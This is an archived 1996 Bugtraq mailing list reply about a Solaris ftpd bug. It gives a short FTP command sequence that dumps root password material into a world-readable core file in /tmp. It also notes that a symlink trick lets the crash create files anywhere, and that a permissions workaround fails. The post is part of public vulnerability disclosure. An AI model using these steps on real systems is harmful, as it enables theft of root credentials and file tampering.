Bugtraq mailing list archives

Re: ftpd bug? Was: bin/1805: Bug in ftpd

From: dougw () ncccs cc nc us (Doug Williams)
Date: Wed, 16 Oct 1996 14:22:06 -0400

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

        I was able to create this core file under Solaris 2.4 as well...and
if I took the time to create a symbolic link before doing the above
procedure, I was able to create files anywhere on the system :(


I got the same on Solaris 2.4.  Being swamped right now I thought I might
create an empty "core" in /tmp and permissions to 000.  When doing the ftp
exploit it fills/replaces the core file, but leaves the permissions
intact.   ...Maybe this soft patch will hold for a bit?


*POOOWWWWW*    (delusional patch blow)

Ummmmm... never mind, I'm a dolt.  I was able to surf around until I found
another 777 directory and Voila!

Current thread:

Re: ftpd bug? Was: bin/1805: Bug in ftpd Martin Rex (Oct 15)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Micah Brandon (Oct 16)
  - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
  - solaris 2.4 license-manager bug Grant Kaufmann (Oct 16)
    - Re: BoS: solaris 2.4 license-manager bug Paul Wickman (Oct 17)
    - fix for symlinks in /tmp Andrew Tridgell (Oct 18)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd gamble () dxcoms cern ch (Oct 16)
  - Re: ftpd bug? Was: bin/1805: Bug in ftpd Andrew Dills (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Jonny Llama (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Perry E. Metzger (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Rune Braathen (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Grant Kaufmann (Oct 16)
- <Possible follow-ups>
- Re: ftpd bug? Was: bin/1805: Bug in ftpd James Poland 6-5251 (Oct 16)

(Thread continues...)